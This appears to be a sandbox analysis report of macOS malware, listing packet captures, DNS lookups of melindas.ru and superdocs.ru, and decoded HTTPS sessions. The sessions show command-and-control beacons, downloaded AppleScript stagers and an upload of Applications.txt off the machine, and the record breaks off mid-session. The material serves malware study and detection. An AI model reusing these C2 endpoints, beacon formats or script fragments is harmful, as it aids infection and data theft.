Aug 24, 2022 11:20:00.065885067 CEST	49356	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:00.065921068 CEST	443	49356	45.82.153.92	192.168.0.53
Aug 24, 2022 11:20:00.170123100 CEST	443	49356	45.82.153.92	192.168.0.53
Aug 24, 2022 11:20:00.170413971 CEST	49356	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:00.177131891 CEST	49356	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:00.177159071 CEST	443	49356	45.82.153.92	192.168.0.53
Aug 24, 2022 11:20:00.183073044 CEST	49356	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:00.183100939 CEST	443	49356	45.82.153.92	192.168.0.53
Aug 24, 2022 11:20:00.185866117 CEST	443	49356	45.82.153.92	192.168.0.53
Aug 24, 2022 11:20:00.186178923 CEST	49356	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:00.186192989 CEST	49356	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:00.186198950 CEST	49356	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:00.232245922 CEST	49356	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:00.235371113 CEST	49356	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:00.235594034 CEST	443	49356	45.82.153.92	192.168.0.53
Aug 24, 2022 11:20:00.235802889 CEST	49356	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:00.235824108 CEST	443	49356	45.82.153.92	192.168.0.53
Aug 24, 2022 11:20:00.236059904 CEST	49356	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:00.241095066 CEST	49356	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:00.284759045 CEST	443	49356	45.82.153.92	192.168.0.53
Aug 24, 2022 11:20:00.314999104 CEST	443	49356	45.82.153.92	192.168.0.53
Aug 24, 2022 11:20:00.315089941 CEST	443	49356	45.82.153.92	192.168.0.53
Aug 24, 2022 11:20:00.315182924 CEST	49356	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:00.315311909 CEST	49356	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:00.334294081 CEST	49356	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:00.334327936 CEST	443	49356	45.82.153.92	192.168.0.53
Aug 24, 2022 11:20:00.591183901 CEST	49357	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:00.591214895 CEST	443	49357	45.82.153.92	192.168.0.53
Aug 24, 2022 11:20:00.591428995 CEST	49357	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:00.836463928 CEST	49357	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:00.836499929 CEST	443	49357	45.82.153.92	192.168.0.53
Aug 24, 2022 11:20:00.943459034 CEST	443	49357	45.82.153.92	192.168.0.53
Aug 24, 2022 11:20:00.943619967 CEST	49357	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:00.950467110 CEST	49357	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:00.950494051 CEST	443	49357	45.82.153.92	192.168.0.53
Aug 24, 2022 11:20:00.953155994 CEST	49357	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:00.953183889 CEST	443	49357	45.82.153.92	192.168.0.53
Aug 24, 2022 11:20:00.955926895 CEST	443	49357	45.82.153.92	192.168.0.53
Aug 24, 2022 11:20:00.956248045 CEST	49357	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:00.956260920 CEST	49357	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:00.956267118 CEST	49357	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:01.001300097 CEST	49357	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:01.004086018 CEST	49357	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:01.004308939 CEST	443	49357	45.82.153.92	192.168.0.53
Aug 24, 2022 11:20:01.004527092 CEST	49357	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:01.004548073 CEST	443	49357	45.82.153.92	192.168.0.53
Aug 24, 2022 11:20:01.004791975 CEST	49357	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:01.007087946 CEST	49357	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:01.048759937 CEST	443	49357	45.82.153.92	192.168.0.53
Aug 24, 2022 11:20:01.088079929 CEST	443	49357	45.82.153.92	192.168.0.53
Aug 24, 2022 11:20:01.088181019 CEST	443	49357	45.82.153.92	192.168.0.53
Aug 24, 2022 11:20:01.088217020 CEST	49357	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:01.088310957 CEST	49357	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:01.105143070 CEST	49357	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:01.105176926 CEST	443	49357	45.82.153.92	192.168.0.53
Aug 24, 2022 11:20:02.252722979 CEST	49358	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:02.252778053 CEST	443	49358	45.82.153.92	192.168.0.53
Aug 24, 2022 11:20:02.253027916 CEST	49358	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:02.707401991 CEST	49358	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:02.707421064 CEST	443	49358	45.82.153.92	192.168.0.53
Aug 24, 2022 11:20:02.817349911 CEST	443	49358	45.82.153.92	192.168.0.53
Aug 24, 2022 11:20:02.817508936 CEST	49358	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:02.821609974 CEST	49358	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:02.821636915 CEST	443	49358	45.82.153.92	192.168.0.53
Aug 24, 2022 11:20:02.823764086 CEST	49358	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:02.823791027 CEST	443	49358	45.82.153.92	192.168.0.53
Aug 24, 2022 11:20:02.826653004 CEST	443	49358	45.82.153.92	192.168.0.53
Aug 24, 2022 11:20:02.827027082 CEST	49358	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:02.827040911 CEST	49358	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:02.827047110 CEST	49358	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:02.850905895 CEST	49358	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:02.852227926 CEST	49358	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:02.852442026 CEST	443	49358	45.82.153.92	192.168.0.53
Aug 24, 2022 11:20:02.852709055 CEST	49358	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:02.852732897 CEST	443	49358	45.82.153.92	192.168.0.53
Aug 24, 2022 11:20:02.852963924 CEST	49358	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:02.853595972 CEST	49358	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:02.896759033 CEST	443	49358	45.82.153.92	192.168.0.53
Aug 24, 2022 11:20:02.968292952 CEST	443	49358	45.82.153.92	192.168.0.53
Aug 24, 2022 11:20:02.968389988 CEST	443	49358	45.82.153.92	192.168.0.53
Aug 24, 2022 11:20:02.968449116 CEST	49358	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:02.968627930 CEST	49358	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:02.978013992 CEST	49358	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:20:02.978034019 CEST	443	49358	45.82.153.92	192.168.0.53

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 24, 2022 11:18:40.659018040 CEST	54661	53	192.168.0.53	8.8.8.8
Aug 24, 2022 11:18:40.724740982 CEST	53	54661	8.8.8.8	192.168.0.53
Aug 24, 2022 11:18:43.112756968 CEST	62081	53	192.168.0.53	8.8.8.8
Aug 24, 2022 11:18:43.268984079 CEST	53	62081	8.8.8.8	192.168.0.53

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Type
Aug 24, 2022 11:18:43.269479036 CEST	192.168.0.53	45.82.153.92	e2b7	Echo
Aug 24, 2022 11:18:43.321131945 CEST	45.82.153.92	192.168.0.53	eab7	Echo Reply
Aug 24, 2022 11:18:44.049618959 CEST	192.168.0.53	45.82.153.92	33e4	Echo
Aug 24, 2022 11:18:44.101528883 CEST	45.82.153.92	192.168.0.53	3be4	Echo Reply

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 24, 2022 11:18:40.659018040 CEST	192.168.0.53	8.8.8.8	0x3724	Standard query (0)	melindas.ru	A (IP address)	IN (0x0001)
Aug 24, 2022 11:18:43.112756968 CEST	192.168.0.53	8.8.8.8	0x477c	Standard query (0)	superdocs.ru	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 24, 2022 11:18:40.724740982 CEST	8.8.8.8	192.168.0.53	0x3724	No error (0)	melindas.ru		45.82.153.92	A (IP address)	IN (0x0001)
Aug 24, 2022 11:18:43.268984079 CEST	8.8.8.8	192.168.0.53	0x477c	No error (0)	superdocs.ru		45.82.153.92	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

melindas.ru

superdocs.ru

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.0.53	49301	45.82.153.92	443

Timestamp	Direction	Data
2022-08-24 09:18:40 UTC	OUT	GET / HTTP/1.1 Host: melindas.ru User-Agent: curl/7.79.1 Accept: /
2022-08-24 09:18:41 UTC	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Wed, 24 Aug 2022 09:18:41 GMT Content-Type: text/html Content-Length: 162 Connection: close
2022-08-24 09:18:41 UTC	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.0.53	49302	45.82.153.92	443

Timestamp	Direction	Data
2022-08-24 09:18:41 UTC	OUT	GET /sys/prepod.php HTTP/1.1 Host: melindas.ru User-Agent: curl/7.79.1 Accept: / X-Usr: pedro
2022-08-24 09:18:41 UTC	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:18:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:18:41 UTC	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.0.53	49311	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:02 UTC	61	OUT	GET /agent/bin/icons/Empty.icns HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: /
2022-08-24 09:19:02 UTC	61	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:02 GMT Content-Type: application/octet-stream Content-Length: 31308 Last-Modified: Thu, 18 Aug 2022 07:36:55 GMT Connection: close ETag: "62fdec17-7a4c" Accept-Ranges: bytes
2022-08-24 09:19:02 UTC	61	IN	Data Raw: 69 63 6e 73 00 00 7a 4c 69 63 31 32 00 00 00 ad 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 40 00 00 00 40 08 06 00 00 00 aa 69 71 de 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 5f 49 44 41 54 78 01 ed d0 01 0d 00 00 00 c2 a0 f7 4f 6d 0e 37 88 40 61 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c bc 0f 0c 40 40 00 01 16 41 98 eb 00 00 00 00 49 45 4e 44 ae 42 60 82 69 63 30 37 00 00 01 84 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 06 00 00 00 c3 3e 61 cb 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 01 36 49 44 41 54 78 01 ed d0 31 01 00 00 00 c2 a0 f5 Data Ascii: icnszLic12PNGIHDR@@iqsRGB_IDATxOm7@a0`0`0`0`0`0`0`@@AIENDB`ic07PNGIHDR>asRGB6IDATx1
2022-08-24 09:19:02 UTC	77	IN	Data Raw: 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 Data Ascii: 0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.0.53	49312	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:02 UTC	92	OUT	POST /l HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / X-Id: C07GV0KZPJH8 X-Users: pedro X-Mod: remove_old Content-Length: 15 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:19:02 UTC	92	OUT	Data Raw: 6d 6f 64 75 6c 65 20 6c 61 75 6e 63 68 65 64 Data Ascii: module launched
2022-08-24 09:19:02 UTC	92	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:02 UTC	92	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.0.53	49313	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:02 UTC	92	OUT	POST /l HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / X-Id: C07GV0KZPJH8 X-Users: pedro X-Mod: bootstrap Content-Length: 48 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:19:02 UTC	92	OUT	Data Raw: 6d 61 70 70 69 6e 67 3a 20 70 61 79 6c 6f 61 64 65 72 20 2d 20 63 6f 6d 2e 75 74 69 6c 73 2e 63 6f 72 65 2e 67 72 61 70 68 69 63 73 2e 61 70 70 Data Ascii: mapping: payloader - com.utils.core.graphics.app
2022-08-24 09:19:02 UTC	92	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:02 UTC	92	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.0.53	49314	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:03 UTC	92	OUT	POST /agent/scripts/listing.applescript HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / Content-Length: 10 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:19:03 UTC	92	OUT	Data Raw: 75 73 65 72 3d 70 65 64 72 6f Data Ascii: user=pedro
2022-08-24 09:19:03 UTC	92	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:03 UTC	93	IN	Data Raw: 31 33 62 63 0d 0a 0a 67 6c 6f 62 61 6c 20 6d 6f 64 75 6c 65 4e 61 6d 65 0a 67 6c 6f 62 61 6c 20 75 73 65 72 4e 61 6d 65 0a 67 6c 6f 62 61 6c 20 64 46 6f 6c 64 65 72 0a 0a 0a 73 65 74 20 6d 6f 64 75 6c 65 4e 61 6d 65 20 74 6f 20 22 6c 69 73 74 69 6e 67 22 0a 73 65 74 20 75 73 65 72 4e 61 6d 65 20 74 6f 20 64 6f 20 73 68 65 6c 6c 20 73 63 72 69 70 74 20 22 77 68 6f 61 6d 69 22 0a 73 65 74 20 64 46 6f 6c 64 65 72 20 74 6f 20 50 4f 53 49 58 20 70 61 74 68 20 6f 66 20 28 28 70 61 74 68 20 74 6f 20 6d 65 20 61 73 20 74 65 78 74 29 20 26 20 22 3a 3a 22 29 0a 0a 0a 0a 0a 6f 6e 20 6c 6f 67 20 28 6d 65 73 73 61 67 65 29 0a 09 73 65 74 20 6d 65 73 73 61 67 65 20 74 6f 20 71 75 6f 74 65 64 20 66 6f 72 6d 20 6f 66 20 6d 65 73 73 61 67 65 0a 09 73 65 74 20 73 65 72 69 Data Ascii: 13bcglobal moduleNameglobal userNameglobal dFolderset moduleName to "listing"set userName to do shell script "whoami"set dFolder to POSIX path of ((path to me as text) & "::")on log (message)set message to quoted form of messageset seri

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.0.53	49315	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:03 UTC	98	OUT	POST /l HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / X-Id: C07GV0KZPJH8 X-Users: pedro X-Mod: remove_old Content-Length: 15 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:19:03 UTC	98	OUT	Data Raw: 6d 6f 64 75 6c 65 20 66 69 6e 69 73 68 65 64 Data Ascii: module finished
2022-08-24 09:19:03 UTC	98	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:03 UTC	98	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.0.53	49316	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:03 UTC	98	OUT	GET /agent/bin/icons/Empty.icns HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: /
2022-08-24 09:19:03 UTC	98	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:03 GMT Content-Type: application/octet-stream Content-Length: 31308 Last-Modified: Thu, 18 Aug 2022 07:36:55 GMT Connection: close ETag: "62fdec17-7a4c" Accept-Ranges: bytes
2022-08-24 09:19:03 UTC	98	IN	Data Raw: 69 63 6e 73 00 00 7a 4c 69 63 31 32 00 00 00 ad 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 40 00 00 00 40 08 06 00 00 00 aa 69 71 de 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 5f 49 44 41 54 78 01 ed d0 01 0d 00 00 00 c2 a0 f7 4f 6d 0e 37 88 40 61 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c bc 0f 0c 40 40 00 01 16 41 98 eb 00 00 00 00 49 45 4e 44 ae 42 60 82 69 63 30 37 00 00 01 84 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 06 00 00 00 c3 3e 61 cb 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 01 36 49 44 41 54 78 01 ed d0 31 01 00 00 00 c2 a0 f5 Data Ascii: icnszLic12PNGIHDR@@iqsRGB_IDATxOm7@a0`0`0`0`0`0`0`@@AIENDB`ic07PNGIHDR>asRGB6IDATx1
2022-08-24 09:19:03 UTC	114	IN	Data Raw: 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 c0 80 01 03 06 0c 18 30 60 Data Ascii: 0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`0`

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.0.53	49317	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:03 UTC	129	OUT	POST /l HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / X-Id: C07GV0KZPJH8 X-Users: pedro X-Mod: payloader Content-Length: 15 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:19:03 UTC	129	OUT	Data Raw: 6d 6f 64 75 6c 65 20 6c 61 75 6e 63 68 65 64 Data Ascii: module launched
2022-08-24 09:19:04 UTC	129	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:04 UTC	129	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.0.53	49318	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:04 UTC	129	OUT	GET /agent/payload.php?serial=C07GV0KZPJH8&user=pedro&hash=&display_state=off HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: /
2022-08-24 09:19:04 UTC	129	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:04 UTC	130	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.0.53	49320	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:08 UTC	130	OUT	POST /l HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / X-Id: C07GV0KZPJH8 X-Users: pedro X-Mod: listing Content-Length: 15 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:19:08 UTC	130	OUT	Data Raw: 6d 6f 64 75 6c 65 20 6c 61 75 6e 63 68 65 64 Data Ascii: module launched
2022-08-24 09:19:08 UTC	130	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:08 UTC	130	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.0.53	49319	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:09 UTC	130	OUT	POST /l HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / X-Id: C07GV0KZPJH8 X-Users: pedro X-Mod: bootstrap Content-Length: 42 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:19:09 UTC	130	OUT	Data Raw: 6d 61 70 70 69 6e 67 3a 20 6c 69 73 74 69 6e 67 20 2d 20 63 6f 6d 2e 75 74 69 6c 73 2e 63 6f 72 65 2e 73 79 73 64 2e 61 70 70 Data Ascii: mapping: listing - com.utils.core.sysd.app
2022-08-24 09:19:09 UTC	130	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:09 UTC	130	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.0.53	49303	45.82.153.92	443

Timestamp	Direction	Data
2022-08-24 09:18:43 UTC	OUT	POST /apple/com.php HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / Content-Length: 51 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:18:43 UTC	OUT	Data Raw: 75 73 65 72 3d 70 65 64 72 6f 26 62 75 69 6c 64 5f 76 65 6e 64 6f 72 3d 64 65 66 61 75 6c 74 26 62 75 69 6c 64 5f 76 65 72 73 69 6f 6e 3d 31 2e 31 2e 35 Data Ascii: user=pedro&build_vendor=default&build_version=1.1.5
2022-08-24 09:18:43 UTC	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:18:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:18:43 UTC	IN	Data Raw: 33 38 34 37 0d 0a 0a 67 6c 6f 62 61 6c 20 6d 6f 64 75 6c 65 4e 61 6d 65 0a 67 6c 6f 62 61 6c 20 75 73 65 72 4e 61 6d 65 0a 67 6c 6f 62 61 6c 20 64 46 6f 6c 64 65 72 0a 67 6c 6f 62 61 6c 20 6d 6f 64 43 6f 75 6e 74 0a 67 6c 6f 62 61 6c 20 6d 6f 64 43 6f 75 6e 74 32 0a 67 6c 6f 62 61 6c 20 73 65 72 69 61 6c 4e 75 6d 62 65 72 0a 67 6c 6f 62 61 6c 20 6d 61 63 4f 73 56 65 72 73 69 6f 6e 0a 67 6c 6f 62 61 6c 20 63 6f 6e 6e 65 63 74 69 6f 6e 52 65 74 72 69 65 73 0a 67 6c 6f 62 61 6c 20 64 6f 6d 61 69 6e 73 0a 67 6c 6f 62 61 6c 20 64 6f 6d 61 69 6e 0a 67 6c 6f 62 61 6c 20 64 6f 6d 61 69 6e 49 6e 64 65 78 0a 0a 67 6c 6f 62 61 6c 20 70 4e 61 6d 65 73 0a 67 6c 6f 62 61 6c 20 70 4e 61 6d 65 73 32 0a 67 6c 6f 62 61 6c 20 66 6f 6c 64 65 72 73 41 63 63 65 73 73 4e 61 6d Data Ascii: 3847global moduleNameglobal userNameglobal dFolderglobal modCountglobal modCount2global serialNumberglobal macOsVersionglobal connectionRetriesglobal domainsglobal domainglobal domainIndexglobal pNamesglobal pNames2global foldersAccessNam

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.0.53	49321	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
2022-08-24 09:19:09 UTC	130	OUT	POST /l HTTP/1.1 Host: superdocs.ru User-Agent: curl/7.79.1 Accept: / X-Id: C07GV0KZPJH8 X-Users: pedro X-Mod: listing Content-Length: 69 Content-Type: application/x-www-form-urlencoded
2022-08-24 09:19:09 UTC	130	OUT	Data Raw: 73 74 61 72 74 69 6e 67 20 73 65 72 76 65 72 20 75 70 6c 6f 61 64 20 66 6f 72 20 41 70 70 6c 69 63 61 74 69 6f 6e 73 2e 74 78 74 2e 20 45 78 70 65 63 74 65 64 20 66 69 6c 65 20 73 69 7a 65 3a 20 31 20 4d 42 Data Ascii: starting server upload for Applications.txt. Expected file size: 1 MB
2022-08-24 09:19:10 UTC	131	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Aug 2022 09:19:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-08-24 09:19:10 UTC	131	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.0.53	49322	45.82.153.92	443

Timestamp	kBytes transferred	Direction	Data
